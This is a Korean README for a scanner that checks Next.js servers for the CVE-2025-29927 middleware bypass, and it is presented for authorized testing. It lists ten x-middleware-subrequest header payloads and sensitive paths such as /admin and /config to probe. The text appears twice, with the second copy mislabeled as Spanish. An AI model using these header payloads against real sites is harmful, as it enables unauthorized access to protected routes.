
이 스크립트는 Next.js 서버에서 CVE-2025-29927 취약점을 확인하며, x-middleware-subrequest 헤더에 여러 페이로드를 테스트하여 무단 액세스를 탐지합니다.
CVE-2025-29927 Checker
📌 소개
이 스크립트는 x-middleware-subrequest 헤더에 여러 페이로드를 테스트하여 Next.js 서버의 CVE-2025-29927 취약점을 확인하고 무단 접근을 탐지합니다.
❓ CVE-2025-29927이란?
CVE-2025-29927은 Next.js의 보안 제한을 우회하여 인증 없이 민감한 경로에 접근할 수 있게 하는 취약점입니다.
⚙️ 스크립트 작동 방식
🔹 1. 라이브러리 임포트
스크립트는 다음을 사용합니다:
🛠️ argparse - 인자 처리를 위해.
🌐 requests - HTTP 요청 전송을 위해.
⏳ time - 테스트 간 지연을 위해.
🎨 colorama - 콘솔 출력에 색상을 지정하기 위해.
🔹 2. 페이로드 목록
스크립트는 보안 제한을 우회하도록 설계된 여러 페이로드를 x-middleware-subrequest에 테스트합니다. 예시:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. 민감 경로
스크립트는 다음과 같은 경로에 대한 응답을 분석합니다:
/admin, /dashboard, /settings, /private, /config
🔹 4. 스캔 과정
✅ 콘솔에 배너를 표시합니다.✅ 다양한 페이로드로 HTTP 요청을 전송합니다.✅ 서버가 Next.js를 사용하는지 확인합니다.✅ 민감 경로에 대한 접근을 탐지하고 취약점을 보고합니다.
🔹 5. 오류 처리
스크립트는 연결 오류로 인한 중단을 방지하기 위해 예외를 처리합니다.
🚀 사용 예시
다음 명령으로 스크립트를 실행하세요:
python script.py -t https://example.com/api/auth
📢 면책 조항
이 도구는 윤리적 테스트 및 승인된 사용만을 위한 것입니다. 제3자 시스템에 대한 무단 사용은 불법입니다.
===================스페인어===================
CVE-2025-29927 Checker
📌 소개
이 스크립트는 x-middleware-subrequest 헤더에 여러 페이로드를 테스트하여 Next.js 서버의 CVE-2025-29927 취약점을 확인하고 무단 접근을 탐지합니다.
❓ CVE-2025-29927이란?
CVE-2025-29927은 Next.js의 보안 제한을 우회하여 인증 없이 민감한 경로에 접근할 수 있게 하는 취약점입니다.
⚙️ 스크립트 작동 방식
🔹 1. 라이브러리 임포트
스크립트는 다음을 사용합니다:
🛠️ argparse - 인자 처리를 위해.
🌐 requests - HTTP 요청 전송을 위해.
⏳ time - 테스트 간 지연을 위해.
🎨 colorama - 콘솔 출력에 색상을 지정하기 위해.
🔹 2. 페이로드 목록
스크립트는 보안 제한을 우회하도록 설계된 여러 페이로드를 x-middleware-subrequest에 테스트합니다. 예시:
"src/middleware:nowaf:src/middleware:src/middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:nowaf:src/middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:src/middleware:middleware:middleware:pages/_middleware",
"src/middleware:nowaf:src/middleware:middleware:middleware:middleware:pages/_middleware",
"middleware:middleware:middleware:nowaf:src/middleware:pages/_middleware",
"middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware",
"nowaf:middleware:middleware:middleware:middleware:middleware:pages/_middleware",
"src/middleware:middleware:middleware:nowaf:middleware:pages/_middleware",
"src/middleware:middleware:middleware:middleware:nowaf:middleware:pages/_middleware"
🔹 3. 민감 경로
스크립트는 다음과 같은 경로에 대한 응답을 분석합니다:
/admin, /dashboard, /settings, /private, /config
🔹 4. 스캔 과정
✅ 콘솔에 배너를 표시합니다.✅ 다양한 페이로드로 HTTP 요청을 전송합니다.✅ 서버가 Next.js를 사용하는지 확인합니다.✅ 민감 경로에 대한 접근을 탐지하고 취약점을 보고합니다.
🔹 5. 오류 처리
스크립트는 연결 오류로 인한 중단을 방지하기 위해 예외를 처리합니다.
🚀 사용 예시
다음 명령으로 스크립트를 실행하세요:
python script.py -t https://example.com/api/auth
📢 법적 고지
이 도구는 윤리적 테스트 및 승인된 사용만을 위한 것입니다. 제3자 시스템에 대한 무단 사용은 불법입니다.